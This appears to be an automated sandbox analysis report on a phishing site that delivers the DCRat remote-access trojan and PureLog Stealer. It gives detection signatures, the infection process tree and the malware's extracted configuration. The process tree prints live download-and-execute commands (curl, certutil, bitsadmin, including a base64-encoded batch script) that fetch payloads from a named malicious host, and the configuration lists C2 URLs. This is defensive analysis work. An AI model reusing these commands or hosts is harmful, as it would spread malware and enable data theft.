Edit tour
Windows
Analysis Report
http://mydpd.space/
Overview
Detection
DCRat, PureLog Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected DCRat
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large strings
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Downloads suspicious files via Chrome
Found suspicious ZIP file
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Curl Download And Execute Combination
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Command Line Execution with Suspicious URL and AppData Strings
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- chrome.exe (PID: 6332 cmdline:
C:\Program Files\Goo gle\Chrome \Applicati on\chrome. exe" --sta rt-maximiz ed "about: blank MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 3720 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2056 --fi eld-trial- handle=193 6,i,119049 4545315706 4735,12887 9555430316 86114,2621 44 --disab le-feature s=Optimiza tionGuideM odelDownlo ading,Opti mizationHi nts,Optimi zationHint sFetching, Optimizati onTargetPr ediction / prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - unarchiver.exe (PID: 6556 cmdline:
C:\Windows \SysWOW64\ unarchiver .exe" "C:\ Users\user \Downloads \booking c ertificate .zip MD5: 16FF3CC6CC330A08EED70CBC1D35F5D2) - 7za.exe (PID: 4204 cmdline:
C:\Windows \System32\ 7za.exe" x -pinfecte d -y -o"C: \Users\use r\AppData\ Local\Temp \sscw4o3z. uhw" "C:\U sers\user\ Downloads\ booking ce rtificate. zip MD5: 77E556CDFDC5C592F5C46DB4127C6F4C) - conhost.exe (PID: 6476 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 1096 cmdline:
cmd.exe" / C "C:\User s\user\App Data\Local \Temp\sscw 4o3z.uhw\b ooking.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6128 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - booking.exe (PID: 3396 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\sscw4o3 z.uhw\book ing.exe MD5: 0B53BA82D2110EB76BA533996829BEDB) - cmd.exe (PID: 3356 cmdline:
C:\Windows \system32\ cmd.exe /c where cur l >nul 2>& 1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3792 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - where.exe (PID: 1864 cmdline:
where curl MD5: 3CF958B0F63FB1D74F7FCFE14B039A58) - cmd.exe (PID: 5732 cmdline:
cmd.exe /c curl -s h ttp://safe .host18691 70.hostlan d.pro/book ing/certif icate.exe --output " %appdata%\ certificat e.exe" && start /min "" "%appd ata%\certi ficate.exe " >nul 2>& 1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4712 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 5176 cmdline:
curl -s ht tp://safe. host186917 0.hostland .pro/booki ng/certifi cate.exe - -output "C :\Users\us er\AppData \Roaming\c ertificate .exe" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) - certificate.exe (PID: 2408 cmdline:
"C:\Users\ user\AppDa ta\Roaming \certifica te.exe" MD5: A5AF5557F3661311D901745E12E4C1B1) - conhost.exe (PID: 5560 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - RegAsm.exe (PID: 7056 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\RegA sm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13) - RegAsm.exe (PID: 2924 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\RegA sm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13) - ms_tool.exe (PID: 4592 cmdline:
"C:\Users\ user\AppDa ta\Roaming \ms_tool.e xe" MD5: 50FDB24B38E7D01DCBA0FEC2B06631EE) - WerFault.exe (PID: 2824 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 4 592 -s 560 MD5: C31336C1EFC2CCB44B4326EA793040F2) - ms_updater.exe (PID: 4912 cmdline:
"C:\Users\ user\AppDa ta\Roaming \ms_update r.exe" MD5: 97E237F83A01ADF240334BDCF59C6C85) - wscript.exe (PID: 3472 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\windo wshosts\vX tHHdT0KJyK D4HYSanHeW At.vbe" MD5: FF00E0480075B095948000BDC66E81F0) - cmd.exe (PID: 652 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Roami ng\windows hosts\VTrW Z2Bzj5Jwcv V8Fcoo.bat " " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5780 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - hosthelper.exe (PID: 1100 cmdline:
C:\Users\u ser\AppDat a\Roaming\ windowshos ts\hosthel per.exe MD5: 6152A61E1A68E4126314D48AC39CE880) - cmd.exe (PID: 2352 cmdline:
cmd.exe" / C "C:\User s\user\App Data\Local \Temp\sscw 4o3z.uhw\r un.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 748 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 3060 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho QGVjaG8 gb2ZmCnNld GxvY2FsIGV uYWJsZWRlb GF5ZWRleHB hbnNpb24KC ndoZXJlIGN 1cmwgPm51b CAyPiYxCml mICFlcnJvc mxldmVsISA 9PSAwICgKI CAgIHJlbSB SdW4gY29tb WFuZCBmb3I gY3VybAogI CAgY3VybCA tcyBodHRwO i8vc2FmZS5 ob3N0MTg2O TE3MC5ob3N 0bGFuZC5wc m8vYm9va2l uZy9sb2FkZ XIuZXhlIC0 tb3V0cHV0I CIlYXBwZGF 0YSVcd2luZ G93c2hvc3R zLmV4ZSIgJ iYgc3RhcnQ gIiIgIiVhc HBkYXRhJVx 3aW5kb3dza G9zdHMuZXh lIgogICAgZ 290byA6ZW9 mCikKCndoZ XJlIGNlcnR 1dGlsID5ud WwgMj4mMQp pZiAhZXJyb 3JsZXZlbCE gPT0gMCAoC iAgICByZW0 gUnVuIGNvb W1hbmQgZm9 yIGNlcnR1d GlsCiAgICB jZXJ0dXRpb CAtdXJsY2F jaGUgLXNwb Gl0IC1mICJ odHRwOi8vc 2FmZS5ob3N 0MTg2OTE3M C5ob3N0bGF uZC5wcm8vY m9va2luZy9 sb2FkZXIuZ XhlIiAiJWF wcGRhdGElX HdpbmRvd3N ob3N0cy5le GUiICYgc3R hcnQgL21pb iAiIiAiJWF wcGRhdGElX HdpbmRvd3N ob3N0cy5le GUiCiAgICB nb3RvIDplb 2YKKQoKd2h lcmUgYml0c 2FkbWluID5 udWwgMj4mM QppZiAhZXJ yb3JsZXZlb CEgPT0gMCA oCiAgICByZ W0gUnVuIGN vbW1hbmQgZ m9yIGJpdHN hZG1pbgogI CAgYml0c2F kbWluIC90c mFuc2ZlciB teWRvd25sb 2Fkam9iIC9 wcmlvcml0e SBub3JtYWw gaHR0cDovL 3NhZmUuaG9 zdDE4NjkxN zAuaG9zdGx hbmQucHJvL 2Jvb2tpbmc vbG9hZGVyL mV4ZSAiJWF wcGRhdGElX HdpbmRvd3N ob3N0cy5le GUiICYgc3R hcnQgL21pb iAiIiAiJWF wcGRhdGElX HdpbmRvd3N ob3N0cy5le GUiCiAgICB nb3RvIDplb 2YKKQoKZXh pdCAvYg== " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - certutil.exe (PID: 2668 cmdline:
certutil - decode -f - MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
- chrome.exe (PID: 4524 cmdline:
C:\Program Files\Goo gle\Chrome \Applicati on\chrome. exe" "http ://mydpd.s pace/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- cmd.exe (PID: 7120 cmdline:
C:\Windows \system32\ cmd.exe" / c curl -s http://saf e.host1869 170.hostla nd.pro/boo king/certi ficate.exe --output C:\Users\u ser\AppDat a\Roaming\ certificat e.exe && C :\Users\us er\AppData \Roaming\c ertificate .exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3536 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 3060 cmdline:
curl -s ht tp://safe. host186917 0.hostland .pro/booki ng/certifi cate.exe - -output C: \Users\use r\AppData\ Roaming\ce rtificate. exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) - certificate.exe (PID: 4464 cmdline:
C:\Users\u ser\AppDat a\Roaming\ certificat e.exe" MD5: A5AF5557F3661311D901745E12E4C1B1) - RegAsm.exe (PID: 6556 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\RegA sm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13) - RegAsm.exe (PID: 1172 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\RegA sm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13) - WerFault.exe (PID: 5908 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 1 172 -s 644 MD5: C31336C1EFC2CCB44B4326EA793040F2)
- cmd.exe (PID: 4764 cmdline:
C:\Windows \system32\ cmd.exe" / c curl -s http://saf e.host1869 170.hostla nd.pro/boo king/certi ficate.exe --output C:\Users\u ser\AppDat a\Roaming\ certificat e.exe && C :\Users\us er\AppData \Roaming\c ertificate .exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4444 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 1124 cmdline:
curl -s ht tp://safe. host186917 0.hostland .pro/booki ng/certifi cate.exe - -output C: \Users\use r\AppData\ Roaming\ce rtificate. exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) - certificate.exe (PID: 2408 cmdline:
C:\Users\u ser\AppDat a\Roaming\ certificat e.exe" MD5: A5AF5557F3661311D901745E12E4C1B1) - RegAsm.exe (PID: 3936 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\RegA sm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13) - ms_tool.exe (PID: 2352 cmdline:
"C:\Users\ user\AppDa ta\Roaming \ms_tool.e xe" MD5: 48F4EA6E78CFEC1BFBB95E6B1612E011) - WerFault.exe (PID: 5768 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 2 352 -s 484 MD5: C31336C1EFC2CCB44B4326EA793040F2) - ms_updater.exe (PID: 5060 cmdline:
"C:\Users\ user\AppDa ta\Roaming \ms_update r.exe" MD5: 97E237F83A01ADF240334BDCF59C6C85) - wscript.exe (PID: 5792 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\windo wshosts\vX tHHdT0KJyK D4HYSanHeW At.vbe" MD5: FF00E0480075B095948000BDC66E81F0) - cmd.exe (PID: 1412 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Roami ng\windows hosts\VTrW Z2Bzj5Jwcv V8Fcoo.bat " " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7092 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - hosthelper.exe (PID: 2924 cmdline:
C:\Users\u ser\AppDat a\Roaming\ windowshos ts\hosthel per.exe MD5: 6152A61E1A68E4126314D48AC39CE880)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
DCRat | DCRat is a typical RAT that has been around since at least June 2019. | No Attribution |
{"SCRT": "{\"I\":\"~\",\"y\":\">\",\"Q\":\"|\",\"0\":\"*\",\"c\":\"`\",\"U\":\"^\",\"h\":\"(\",\"5\":\"-\",\"S\":\"$\",\"2\":\"#\",\"k\":\")\",\"Y\":\".\",\"C\":\"@\",\"T\":\";\",\"N\":\"_\",\"d\":\"<\",\"b\":\",\",\"1\":\" \",\"o\":\"!\",\"w\":\"&\",\"3\":\"%\"}", "PCRT": "{\"B\":\" \",\"t\":\"`\",\"T\":\"(\",\"R\":\"$\",\"Q\":\"*\",\"J\":\".\",\"U\":\"%\",\"k\":\"&\",\"d\":\")\",\"2\":\">\",\"v\":\"^\",\"l\":\"<\",\"V\":\"_\",\"0\":\"@\",\"Z\":\"-\",\"D\":\"|\",\"E\":\"~\",\"3\":\"!\",\"N\":\";\",\"e\":\",\",\"P\":\"#\"}", "TAG": "", "MUTEX": "DCR_MUTEX-Cg00HkDVQFtbDh2HwZ5m", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 0, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://host1869170.hostland.pro/@=MWM3QDZ3QmM", "H2": "http://host1869170.hostland.pro/@=MWM3QDZ3QmM", "T": "0"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security | ||
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
MALWARE_Win_DCRat | DCRat payload | ditekSHen |
| |
JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security | ||
MALWARE_Win_DCRat | DCRat payload | ditekSHen |
| |
Click to see the 1 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security | ||
JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security | ||
JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security | ||
JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security | ||
JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security | ||
Click to see the 14 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security | ||
MALWARE_Win_DCRat | DCRat payload | ditekSHen |
| |
JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security | ||
MALWARE_Win_DCRat | DCRat payload | ditekSHen |
| |
JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security | ||
Click to see the 28 entries |
System Summary |
---|
Source: | Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): |
Source: | Author: Sreeman, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: |
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | HTTP Parser: | ||
Source: | HTTP Parser: | ||
Source: | HTTP Parser: | ||
Source: | HTTP Parser: | ||
Source: | HTTP Parser: | ||
Source: | HTTP Parser: | ||
Source: | HTTP Parser: |
Source: | HTTPS traffic detected: |
Source: | File opened: | Jump to behavior |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 21_2_0041F1BA | |
Source: | Code function: | 22_2_0041F1BA | |
Source: | Code function: | 23_2_0004A5F4 | |
Source: | Code function: | 23_2_0005B8E0 | |
Source: | Code function: | 23_2_0006AAA8 | |
Source: | Code function: | 50_2_0041F1BA | |
Source: | Code function: | 51_2_00D9A5F4 | |
Source: | Code function: | 51_2_00DAB8E0 | |
Source: | Code function: | 51_2_00DBAAA8 |
Software Vulnerabilities |
---|
Source: | Child: |
Source: | Code function: | 11_2_00007FF698DD43F6 | |
Source: | Code function: | 11_2_00007FF698DC7510 | |
Source: | Code function: | 11_2_00007FF698DD6610 | |
Source: | Code function: | 11_2_00007FF698DE5570 | |
Source: | Code function: | 11_2_00007FF698DE5570 | |
Source: | Code function: | 11_2_00007FF698DE5570 | |
Source: | Code function: | 11_2_00007FF698DE3550 | |
Source: | Code function: | 11_2_00007FF698DC78D8 | |
Source: | Code function: | 11_2_00007FF698DE60F0 | |
Source: | Code function: | 11_2_00007FF698DE60F0 | |
Source: | Code function: | 11_2_00007FF698DE60F0 | |
Source: | Code function: | 11_2_00007FF698DE70B0 | |
Source: | Code function: | 35_2_00007FF83888B3DD | |
Source: | Code function: | 35_2_00007FF83887EEEA |
Networking |
---|
Source: | URLs: |
Source: | DNS query: |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | HTTP traffic detected: |